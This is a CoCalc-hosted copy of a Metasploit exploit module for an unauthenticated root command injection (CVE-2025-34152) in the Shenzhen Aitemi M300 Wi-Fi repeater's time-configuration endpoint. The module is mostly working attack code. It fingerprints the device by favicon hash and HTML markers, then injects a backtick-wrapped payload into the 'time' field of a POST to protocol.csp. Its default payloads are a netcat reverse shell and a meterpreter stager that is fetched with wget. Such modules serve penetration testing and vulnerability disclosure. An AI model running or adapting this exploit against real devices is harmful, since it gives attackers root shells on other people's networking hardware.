Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/http/aitemi_m300_time_rce.rb
21839 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'digest'

7


8
class MetasploitModule < Msf::Exploit::Remote

9
  Rank = GoodRanking

10


11
  include Msf::Exploit::Remote::HttpClient

12
  prepend Msf::Exploit::Remote::AutoCheck

13


14
  def initialize(info = {})

15
    super(

16
      update_info(

17
        info,

18
        'Name' => 'Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated RCE (time param)',

19
        'Description' => %q{

20
          This module exploits an unauthenticated remote command injection vulnerability

21
          in the Shenzhen Aitemi M300 Wi-Fi Repeater (hardware model MT02). The vulnerability

22
          lies in the 'time' parameter of the time configuration endpoint, which is passed

23
          unsanitized to a shell command executed via the `date -s` mechanism. The injection

24
          executes with root privileges, without requiring authentication, reboot, or

25
          network reconfiguration.

26
        },

27
        'Author' => [

28
          'Valentin Lobstein' # Vulnerability discovery and Metasploit module

29
        ],

30
        'License' => MSF_LICENSE,

31
        'References' => [

32
          ['URL', 'https://chocapikk.com/posts/2025/when-a-wifi-name-gives-you-root-part-two/'],

33
          ['CVE', '2025-34152']

34
        ],

35
        'Platform' => %(linux unix),

36
        'Arch' => [ARCH_CMD, ARCH_MIPSBE],

37
        'Payload' => {

38
          'BadChars' => "\x60"

39
        },

40
        'Targets' => [

41
          [

42
            'Unix Command',

43
            {

44
              'Platform' => 'unix',

45
              'Arch' => ARCH_CMD,

46
              'DefaultOptions' => {

47
                'PAYLOAD' => 'cmd/unix/reverse_netcat'

48
              }

49
            }

50
          ],

51
          [

52
            'Linux Meterpreter MIPSBE (MAY crash HTTP worker)',

53
            {

54
              'Platform' => 'linux',

55
              'Arch' => [ARCH_CMD, ARCH_MIPSBE],

56
              'DefaultOptions' => {

57
                'FETCH_DELETE' => true,

58
                'FETCH_COMMAND' => 'WGET',

59
                'FETCH_WRITABLE_DIR' => '/tmp',

60
                'PAYLOAD' => 'cmd/linux/http/mipsbe/meterpreter/reverse_tcp'

61
              }

62
            }

63
          ]

64
        ],

65
        'DefaultTarget' => 0,

66
        'Privileged' => true,

67
        'DisclosureDate' => '2025-08-07',

68
        'Notes' => {

69
          'Stability' => [CRASH_SERVICE_DOWN],

70
          'Reliability' => [REPEATABLE_SESSION],

71
          'SideEffects' => [IOC_IN_LOGS]

72
        }

73
      )

74
    )

75
  end

76


77
  def check

78
    fingerprint_hits = []

79


80
    res = send_request_cgi(

81
      'method' => 'GET',

82
      'uri' => normalize_uri(target_uri.path, 'favicon.ico')

83
    )

84


85
    return CheckCode::Unknown('No response from target') unless res

86
    return CheckCode::Safe('favicon.ico not found') unless res.code == 200

87


88
    hash = Digest::SHA256.hexdigest(res.body)

89
    if hash == 'eed1926b9b10ed9c54de6215dded343d066f7e447a7b62fe9700b7af4b34d8ee'

90
      print_good('Favicon hash matched – likely Aitemi M300 device')

91
      fingerprint_hits << 'favicon'

92
    end

93


94
    server_header = res.headers['Server']

95
    if server_header&.start_with?('lighttpd/1.4.32')

96
      print_good("HTTP server version matched: #{server_header}")

97
      fingerprint_hits << 'httpd'

98
    end

99


100
    %w[index.html home.html].each do |page|

101
      res_html = send_request_cgi(

102
        'method' => 'GET',

103
        'uri' => normalize_uri(target_uri.path, page)

104
      )

105


106
      next unless res_html&.code == 200

107


108
      if res_html.body.include?('langen.js') && res_html.body.include?('dw(TT_SetWifiExt)')

109
        print_good("HTML fingerprint matched in #{page} – UI strings detected")

110
        return CheckCode::Appears('HTML language markers confirmed')

111
      end

112
    end

113


114
    if fingerprint_hits.any?

115
      return CheckCode::Detected("Partial match: #{fingerprint_hits.join(', ')}")

116
    end

117


118
    CheckCode::Unknown('No identifiable fingerprint found')

119
  end

120


121
  def exploit

122
    raw_payload = "`#{payload.encoded}`"

123
    encoded_payload = CGI.escape(raw_payload).gsub('+', '%20')

124


125
    send_request_cgi(

126
      'method' => 'POST',

127
      'uri' => normalize_uri(target_uri.path, 'protocol.csp?'),

128
      'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',

129
      'data' => "fname=system&opt=time_conf&function=set&time=#{encoded_payload}"

130
    )

131
  end

132
end

133


134